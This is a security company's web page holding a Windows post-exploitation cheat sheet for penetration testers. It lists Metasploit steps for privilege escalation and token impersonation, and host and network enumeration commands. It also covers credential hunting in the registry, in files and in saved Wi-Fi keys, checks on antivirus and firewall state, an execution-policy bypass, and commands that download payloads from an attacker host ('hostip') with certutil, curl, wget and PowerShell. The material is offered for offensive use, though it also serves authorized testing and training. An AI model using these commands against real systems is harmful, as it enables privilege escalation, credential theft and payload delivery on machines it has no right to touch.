top of page

Windows (Post-Exploitation)

Metasploit Shell

Local Exploit Suggester:

*background current session <background>

{
use post/multi/recon/local_exploit_suggester

set session x

run

}

*after finding valid exploit

{

use exploit/…

set session x

set lport xxxx

set lhost x.x.x.x run

}

 

Get User: getuid

Get Shell: shell

Grab tokens with incognito: {

load incognito

list_tokens

impersonate_token “TOKEN”

}

 

Try to Auto-Elevate: getsystem

Migrate to Process: migrate -n <process.exe>

System Info

Basic System Info: systeminfo

Show System Patches: wmic qfe

List Drives: wmic logicaldisk

List Drivers: driverquery

Show All Users: net user

Show Current User: whoami

Show Current User Privs: whoami /priv

Show Current User Groups: whoami /groups

Info On Specific User: net user <user>

Users In Localgroup: net localgroup

Users In Other Groups: net localgroup <group>

Check Processes Status: ps

Check Scheduled Tasks: schtasks /query /fo LIST /v

Check Service Permissions: wmic service list brief

Check for Unquoted Service Paths: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Networking

Simple Network Info: ipconfig

Advanced Network Info: ipconfig /all

Arp Table: arp -a

Route Table: route print

Netstat Ports: netstat /ano

Get Wifi AP SSID: netsh wlan show profile

Password Hunting

Search For String: findstr /si <string> *.txt *.<filetype>

Search For File: dir /s fileName*

Search In Registry (HKCU): reg query HKLM /f password /t REG_SZ /s

Search In Registry (HKLM): reg query HKCU /f password /t REG_SZ /s

 

Get Wifi Password: netsh wlan show profile <SSID> key=clear

Cat Out File: type <file>

Dir all files in directory (including hidden): dir /R

Currently Stored Credentials: cmdkey /list

Check Access To registry: powershell Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Antivirus and Firewall

Service Control Search: sc query <Antivirus>

Quick Service Control Query: sc queryex type= service

Show Firewall State (1): netsh advfirewall firewall dump

Show Firewall State (2): netsh firewall show state

Show Firewall Config: netsh firewall show config

Execution and Uploading Payloads

*run and upload files to temp or user folder which current user has access to. cd c:\\windows\\temp

 

Powershell Execution Policy Bypass: powershell -ep bypass

Load PowerShell: load powershell

 

Download File (certutil): certutil -urlcache -f <http://hostip/file> file

Download File (wget): wget -o file http://hostip/file

Download File (curl): curl.exe -o index.html http://hostip/file

Download File (PowerShell): powershell.exe -Command "Invoke-WebRequest -OutFile ./file http://hostip/file"

 

Runas: C:\Windows\System32\runas.exe /user:<CREDS FOUND> /savecred ‘C:\Windows\System32\cmd.exe /c <Command>

Restart PC from PowerShell: restart-computer

  • Twitter
  • LinkedIn
  • discord-logo--v2
  • kisspng-github-pages-logo-repository-fork-github-logo-1-magentys-5b69de71b51265

Dragon Eye Intelligence LLC

bottom of page